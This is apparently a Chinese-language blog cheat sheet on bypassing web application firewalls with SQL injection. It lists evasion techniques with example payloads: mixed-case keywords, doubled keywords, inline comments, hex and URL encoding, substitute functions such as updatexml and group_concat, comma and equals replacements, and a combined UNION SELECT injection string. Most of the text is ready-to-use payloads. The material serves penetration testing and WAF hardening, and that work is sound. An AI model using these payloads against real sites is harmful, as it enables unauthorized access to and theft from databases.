- 字母大小写混合绕过
原因:服务器端检测时未开启大小写不敏感
形式:`UnIon SeLecT`
- 多重关键字
原因:服务器端检测到敏感字符时替换为空
形式:`ununionion selselectect`
- 注释
原因:服务器端未检测或检测不严注释内的字符串
形式:`/**/,/*!*/,/*!12345*/,#,-- -` 等
- 编码绕过
原因:服务器端未检测或检测不严具有编码形式的关键字
类型:十六进制编码、URL 编码、Unicode 编码
形式:`0x61646d696e、%20、%u0020`
- 等价函数或命令
原因:服务器端黑名单不完整,过滤不严
形式:
Mysql 查询:`Union distinct、updatexml、Extractvalue、floor`
字符串截取函数:`mid、substr、substring、left、reverse `
字符串连接函数:`concat、group_concat、concat_ws `
字符串转换:`char、hex、unhex`
替换逗号:`limit 1 offset 0,mid(version() from 1 for 1) `
替换等号:`like`
- 组合绕过
原因:服务器端检测多处位置,需要多重绕过方式组合使用
形式:`id = 1’ and/**/’1’like’2’/**//*!12345union*/select 1,2,3`
- 特殊字符
原因:数据库中效果相同,服务器端却没有限制
形式:
科学记数法 `and 1e0 = 1e0 `
空白字符 `%0a %a0 %0b %20 %09 `
反单引号 `table_name`
括号 `select * from (test.admin)`
SQL注入绕 WAF 的方式
于 2023-12-28 15:14:00 首次发布